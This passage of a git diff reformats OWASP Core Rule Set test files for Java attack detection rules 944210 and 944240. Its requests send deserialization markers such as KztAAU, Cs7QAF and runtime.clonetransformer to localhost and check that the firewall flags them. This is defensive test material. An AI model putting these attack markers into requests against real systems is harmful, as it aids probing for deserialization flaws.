Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log: + expect_ids: [944210] + - test_id: 30 desc: "Content-Type application/json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"KztAAU\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-32 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: 
application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-33 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-34 + KztAAU + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-35 + KztAAU + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 35 desc: "Argument test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 36 desc: "Argument name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log: + expect_ids: [944210] + - test_id: 37 desc: "Cookie test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Cs7QAF - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-38 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 38 desc: "Cookie name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Cs7QAF=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 39 desc: "Request header test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Cs7QAF - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 40 desc: "XML element includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 41 desc: "XML attribute name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 42 desc: "XML attribute value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 43 desc: "XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 44 desc: "Nested XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 45 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 46 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Cs7QAF\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log: + expect_ids: [944210] + - test_id: 47 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Cs7QAF\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + 
-----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-49 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-50 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-51 + Cs7QAF + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; 
name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" + Cs7QAF + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 17b6ea6..7d5a2ef 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml 
@@ -1,1791 +1,1789 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944240.yaml" - description: "Positive tests for rule 944240" +rule_id: 944240 tests: - - test_title: 944240-1 + - test_id: 1 desc: "Argument test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 2 desc: "Argument name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 3 desc: "Cookie test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 4 desc: "Cookie name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.clonetransformer=test - method: 
